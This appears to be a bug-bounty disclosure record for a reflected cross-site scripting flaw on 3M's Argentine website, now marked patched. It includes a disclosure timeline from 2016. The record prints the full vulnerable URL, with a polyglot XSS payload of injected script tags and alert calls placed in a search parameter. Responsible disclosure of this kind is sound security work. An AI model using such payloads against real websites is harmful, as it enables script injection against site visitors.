Vulnerable URL:
http://www.3m.com.ar/3M/es_AR/inicio/todos-los-productos-3m/?N=5002385+8711017&Ntt;=%27;alert(0)//\%27;alert(1)//%22;alert(2)//\%22;alert+(3)//--%3E%3C/SCRIPT%3E%22%3E%27+%3E%3CSCRIPT%3Ealert(/XSSPOSED/)%3C/SCRIPT%3E=&{}%22);}alert(6+);function+xss(){//&LC;=es_AR&co;=cc&gsaAction;=scBR&rt;=rs&type;=cc
Details:
Description |
Value |
Patched: |
Yes, at |
Vulnerability type: |
XSS |
Vulnerability status: |
Publicly disclosed |
Alexa Rank |
958415 |
VIP website status: |
No |
Check 3m.com.ar SSL connection: |
(Grade: A) |
Coordinated Disclosure Timeline:
Description |
Value |
Vulnerability submitted via Open Bug Bounty |
2 August, 2016 03:26 GMT |
Generic security notifications sent to website owner |
2 August, 2016 03:28 GMT |
Vulnerability details disclosed by researcher |
9 August, 2016 04:12 GMT |
Vulnerability patched by the website owner |
11 September, 2016 14:42 GMT |